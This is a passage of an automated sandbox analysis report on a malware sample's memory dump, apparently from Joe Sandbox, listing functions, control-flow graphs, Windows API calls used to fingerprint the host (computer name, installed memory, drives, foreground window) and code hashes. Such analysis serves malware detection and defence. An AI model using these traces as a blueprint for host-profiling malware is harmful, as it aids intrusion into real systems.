422c60-422c68 286->293 294 422dc0-422dd2 286->294 295 422c24-422c57 286->295 296 422d89-422d95 286->296 297 422bd0-422bd8 286->297 298 422c10-422c1d 286->298 299 422c70-422c79 286->299 300 422b91-422bb9 286->300 301 422bf7-422c07 286->301 302 422dd9-422de8 286->302 303 422d9c-422db0 286->303 287->282 288->283 288->284 288->289 288->306 288->307 288->308 288->309 288->313 289->306 289->307 289->308 289->309 290->301 291->297 292->290 292->291 292->292 292->293 292->294 292->295 292->296 292->297 292->298 292->299 292->300 292->301 292->302 292->303 311 422c7d-422c8a 293->311 294->302 315 423022-42302c 294->315 316 423020 294->316 317 423120-423187 294->317 318 423001-423013 294->318 319 422def-422df6 294->319 320 423016-42301f 294->320 321 422dff-422e09 294->321 295->293 296->290 296->291 296->292 296->293 296->294 296->295 296->297 296->298 296->299 296->301 296->302 296->303 296->315 296->316 296->317 296->318 296->319 296->320 296->321 297->290 298->292 298->293 298->294 298->295 298->299 298->302 299->311 300->290 300->291 300->292 300->293 300->294 300->295 300->297 300->298 300->299 300->301 300->302 301->292 301->293 301->294 301->295 301->298 301->299 301->302 302->315 302->316 302->317 302->318 302->319 302->320 302->321 303->294 303->302 303->315 303->316 303->317 303->318 303->319 303->320 303->321 306->307 306->309 307->306 307->308 307->309 308->283 312 422e22-422e2a 308->312 308->313 308->314 309->306 309->307 309->308 325 422c90-422cfe 311->325 312->283 312->284 312->289 312->306 312->307 312->308 312->309 312->313 327 422f20-422f8a 313->327 314->283 314->286 314->308 314->312 314->314 323 423190-4231be 317->323 318->320 319->321 320->316 321->320 323->323 332 4231c0-423208 RtlExpandEnvironmentStrings 323->332 325->325 334 422d00-422d10 325->334 327->327 335 422f8c-422f97 327->335 337 423210-42325f 332->337 334->292 338 422d16-422d25 334->338 339 422e10-422e1b 335->339 340 422f9d-422fa9 335->340 337->337 341 423261-42326e 337->341 342 422d30-422d37 338->342 339->283 339->312 339->314 343 422fb0-422fb7 340->343 344 4232d2-4232db 341->344 345 4235e1-42366e 341->345 346 4235c6 341->346 347 4235b6-4235be 341->347 348 4232b4 341->348 349 423275-4232ad call 407ed0 RtlExpandEnvironmentStrings 341->349 350 4232c5-4232ca 341->350 351 423448-4234f4 call 407ed0 341->351 352 42342f-423441 341->352 353 4232dc-42332b call 407ed0 341->353 354 4232bc-4232c2 call 407ee0 341->354 355 422d43-422d49 342->355 356 422d39-422d3c 342->356 357 422fc3-422fc9 343->357 358 422fb9-422fbc 343->358 359 423670-423684 345->359 347->346 348->354 349->345 349->346 349->347 349->348 349->350 349->351 349->352 349->353 349->354 362 4232d0 350->362 399 423500-423536 351->399 352->344 352->345 352->346 352->347 352->350 352->351 352->354 360 4236a4-4236bb 352->360 361 4235cc-4235d2 call 407ee0 352->361 352->362 363 4237b4 352->363 364 4237ba-4237c2 call 407ee0 352->364 365 4235db 352->365 400 423330-4233ad 353->400 354->350 355->292 370 422d4f-422d82 call 43d910 355->370 356->342 369 422d3e 356->369 357->339 373 422fcf-422ff6 call 43d910 357->373 358->343 372 422fbe 358->372 359->359 374 423686-423694 call 421060 359->374 375 4236c0-4236fc 360->375 361->365 369->292 370->290 370->291 370->292 370->293 370->294 370->295 370->296 370->297 370->298 370->299 370->300 370->301 370->302 370->303 370->315 370->316 370->317 370->318 370->319 370->320 370->321 372->339 373->318 393 423699-42369c 374->393 375->375 385 4236fe-423771 375->385 394 423780-423790 385->394 393->360 394->394 398 423792-4237ab call 420c30 394->398 398->363 399->399 402 423538-423543 399->402 400->400 403 4233af-4233bd 400->403 405 423561-42356f 402->405 406 423545-42354f 402->406 407 4233e1-4233f0 403->407 408 4233bf-4233c4 403->408 413 423591-4235af GetLogicalDrives call 440ba0 405->413 414 423571-423574 405->414 412 423550-42355f 406->412 410 4233f2-4233f5 407->410 411 423411-42341b call 440ba0 407->411 409 4233d0-4233df 408->409 409->407 409->409 415 423400-42340f 410->415 419 423420-423428 411->419 412->405 412->412 413->344 413->346 413->347 413->350 413->354 413->360 413->361 413->362 413->363 413->364 413->365 417 423580-42358f 414->417 415->411 415->415 417->413 417->417 419->344 419->345 419->346 419->347 419->350 419->351 419->352 419->354 419->360 419->361 419->362 419->363 419->364 419->365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "0B$7x~$`*B
                                                                                • API String ID: 0-767839351
                                                                                • Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                • Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
                                                                                • Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
                                                                                • Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95
                                                                                Function 00432FE0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 421 432fe0-4330cc GetSystemMetrics * 2 427 4330d3-43334a 421->427
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID: $)6C$C7C$Y8C
                                                                                • API String ID: 4116985748-1654261340
                                                                                • Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                • Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
                                                                                • Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                • Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A
                                                                                Function 00408640 Relevance: 7.7, APIs: 5, Instructions: 220threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 474 408640-408651 call 43d0a0 477 4088e6-4088e8 ExitProcess 474->477 478 408657-40865e call 4354a0 474->478 481 4088e1 call 43d860 478->481 482 408664-40868a GetCurrentProcessId GetCurrentThreadId 478->482 481->477 483 408690-40876a SHGetSpecialFolderPathW 482->483 484 40868c-40868e 482->484 486 408770-40878c 483->486 484->483 486->486 487 40878e-4087bf call 43bc90 486->487 490 4087c0-4087dc 487->490 491 4087f6-40880b GetForegroundWindow 490->491 492 4087de-4087f4 490->492 493 408811-408832 491->493 494 4088ab-4088c3 call 4099e0 491->494 492->490 495 408834-408836 493->495 496 408838-4088a9 493->496 499 4088c5 call 40c660 494->499 500 4088cf-4088d6 494->500 495->496 496->494 503 4088ca call 40b4c0 499->503 500->481 502 4088d8-4088de call 407ee0 500->502 502->481 503->500
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00408664
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040866E
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
                                                                                • GetForegroundWindow.USER32 ref: 00408803
                                                                                • ExitProcess.KERNEL32 ref: 004088E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                • String ID:
                                                                                • API String ID: 4063528623-0
                                                                                • Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                • Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
                                                                                • Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
                                                                                • Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789
                                                                                Function 0042BE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 585 42be8a-42bea6 586 42beb0-42bf05 585->586 586->586 587 42bf07-42bf0e 586->587 588 42c284 587->588 589 42bf14-42bf1b 587->589 591 42c287-42c2a5 588->591 590 42bf20-42bf29 589->590 590->590 592 42bf2b 590->592 594 42c2b0-42c2dd 591->594 592->591 594->594 595 42c2df-42c2e6 594->595 596 42c2fb-42c307 595->596 597 42c2e8-42c2ef 595->597 598 42c321-42c348 call 43f450 596->598 599 42c309-42c30b 596->599 600 42c2f0-42c2f9 597->600 604 42c34d-42c38f GetPhysicallyInstalledSystemMemory 598->604 601 42c310-42c31d 599->601 600->596 600->600 601->601 603 42c31f 601->603 603->598 605 42c390-42c3e9 604->605 605->605 606 42c3eb-42c429 call 41dc90 605->606 609 42c430-42c471 606->609 609->609 610 42c473-42c47a 609->610 611 42c47c-42c483 610->611 612 42c49d 610->612 613 42c490-42c499 611->613 614 42c4a0-42c4aa 612->614 613->613 617 42c49b 613->617 615 42c4ac-42c4af 614->615 616 42c4bd 614->616 618 42c4b0-42c4b9 615->618 619 42c4bf-42c4ce 616->619 617->614 618->618 620 42c4bb 618->620 621 42c4d0-42c4d7 619->621 622 42c4eb-42c53a 619->622 620->619 623 42c4e0-42c4e9 621->623 624 42c540-42c55e 622->624 623->622 623->623 624->624 625 42c560-42c567 624->625 626 42c57b-42c588 625->626 627 42c569-42c56f 625->627 629 42c58a-42c591 626->629 630 42c5ab-42c661 626->630 628 42c570-42c579 627->628 628->626 628->628 631 42c5a0-42c5a9 629->631 632 42c662 630->632 631->630 631->631 632->632
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: BVAI
                                                                                • API String ID: 3960555810-2651495128
                                                                                • Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                • Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
                                                                                • Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                • Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A
                                                                                Function 0042C26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 637 42c26c-42c2a5 call 4327d0 call 407ee0 643 42c2b0-42c2dd 637->643 643->643 644 42c2df-42c2e6 643->644 645 42c2fb-42c307 644->645 646 42c2e8-42c2ef 644->646 647 42c321-42c348 call 43f450 645->647 648 42c309-42c30b 645->648 649 42c2f0-42c2f9 646->649 653 42c34d-42c38f GetPhysicallyInstalledSystemMemory 647->653 650 42c310-42c31d 648->650 649->645 649->649 650->650 652 42c31f 650->652 652->647 654 42c390-42c3e9 653->654 654->654 655 42c3eb-42c429 call 41dc90 654->655 658 42c430-42c471 655->658 658->658 659 42c473-42c47a 658->659 660 42c47c-42c483 659->660 661 42c49d 659->661 662 42c490-42c499 660->662 663 42c4a0-42c4aa 661->663 662->662 666 42c49b 662->666 664 42c4ac-42c4af 663->664 665 42c4bd 663->665 667 42c4b0-42c4b9 664->667 668 42c4bf-42c4ce 665->668 666->663 667->667 669 42c4bb 667->669 670 42c4d0-42c4d7 668->670 671 42c4eb-42c53a 668->671 669->668 672 42c4e0-42c4e9 670->672 673 42c540-42c55e 671->673 672->671 672->672 673->673 674 42c560-42c567 673->674 675 42c57b-42c588 674->675 676 42c569-42c56f 674->676 678 42c58a-42c591 675->678 679 42c5ab-42c661 675->679 677 42c570-42c579 676->677 677->675 677->677 680 42c5a0-42c5a9 678->680 681 42c662 679->681 680->679 680->680 681->681
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: BVAI
                                                                                • API String ID: 3960555810-2651495128
                                                                                • Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                • Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
                                                                                • Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                • Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A
                                                                                Function 0042C282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: BVAI
                                                                                • API String ID: 3960555810-2651495128
                                                                                • Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                • Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
                                                                                • Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                • Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A
                                                                                Function 0043D910 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                Function 0042B842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 530 42b842-42b84c 531 42b86b-42b8b6 FreeLibrary call 43f450 530->531 532 42b84e-42b855 530->532 538 42b8c0-42b8e5 531->538 534 42b860-42b869 532->534 534->531 534->534 538->538 539 42b8e7-42b8f1 538->539 540 42b8f3-42b8fa 539->540 541 42b90b-42b942 GetComputerNameExA 539->541 542 42b900-42b909 540->542 543 42b946 541->543 542->541 542->542 543->543
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerFreeLibraryName
                                                                                • String ID: KHGN
                                                                                • API String ID: 2904949787-1032087821
                                                                                • Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                • Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
                                                                                • Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                • Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56
                                                                                Function 0042B840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 544 42b840-42b8b6 FreeLibrary call 43f450 549 42b8c0-42b8e5 544->549 549->549 550 42b8e7-42b8f1 549->550 551 42b8f3-42b8fa 550->551 552 42b90b-42b942 GetComputerNameExA 550->552 553 42b900-42b909 551->553 554 42b946 552->554 553->552 553->553 554->554
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerFreeLibraryName
                                                                                • String ID: KHGN
                                                                                • API String ID: 2904949787-1032087821
                                                                                • Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                • Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
                                                                                • Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                • Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92
                                                                                Function 0042B94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: bC
                                                                                • API String ID: 3545744682-4190571504
                                                                                • Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                • Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
                                                                                • Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                • Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96
                                                                                Function 0042B948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: bC
                                                                                • API String ID: 3545744682-4190571504
                                                                                • Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                • Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
                                                                                • Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                • Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96
                                                                                Function 0042B7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID: KHGN
                                                                                • API String ID: 3545744682-1032087821
                                                                                • Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                • Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
                                                                                • Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                • Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92
                                                                                Function 00409D5E Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00409E1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                • Instruction ID: 794dd10beed9ab1fdd81d0f6796807d90850f10cc366af128ac51e95daa83683
                                                                                • Opcode Fuzzy Hash: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                • Instruction Fuzzy Hash: C3110879A842508FC7188F25D8816A97FF1FB55325B19D0ADD491EB363C23CD846CB58
                                                                                Function 0043D880 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
                                                                                • Instruction ID: 0f926294dc6f60f2445246b0eb10c1f08d66fb03fcf9e8185527a5568484abe7
                                                                                • Opcode Fuzzy Hash: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
                                                                                • Instruction Fuzzy Hash: 3AF0F075518302EFD7242F29BC49B17367CEF8B306F04183AF50191062DB35EC059769
                                                                                Function 00436805 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 00436831
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultLanguageUser
                                                                                • String ID:
                                                                                • API String ID: 95929093-0
                                                                                • Opcode ID: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                • Instruction ID: c1e6da90ff38b23c1098b9489220249bba1124fa0f23aac35cb26dcf4f2101a0
                                                                                • Opcode Fuzzy Hash: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                • Instruction Fuzzy Hash: 31110434908686CFC719DB3888512A8BFB27F6B304F05839CC48D873A2DB35A954CF22
                                                                                Function 0042DE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: BlanketProxy
                                                                                • String ID:
                                                                                • API String ID: 3890896728-0
                                                                                • Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                • Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
                                                                                • Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                • Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2
                                                                                Function 004316B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: BlanketProxy
                                                                                • String ID:
                                                                                • API String ID: 3890896728-0
                                                                                • Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                • Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
                                                                                • Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                • Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82
                                                                                Function 0040C660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                • Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
                                                                                • Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                • Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E
                                                                                Function 0040C69E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0
                                                                                Memory Dump Source
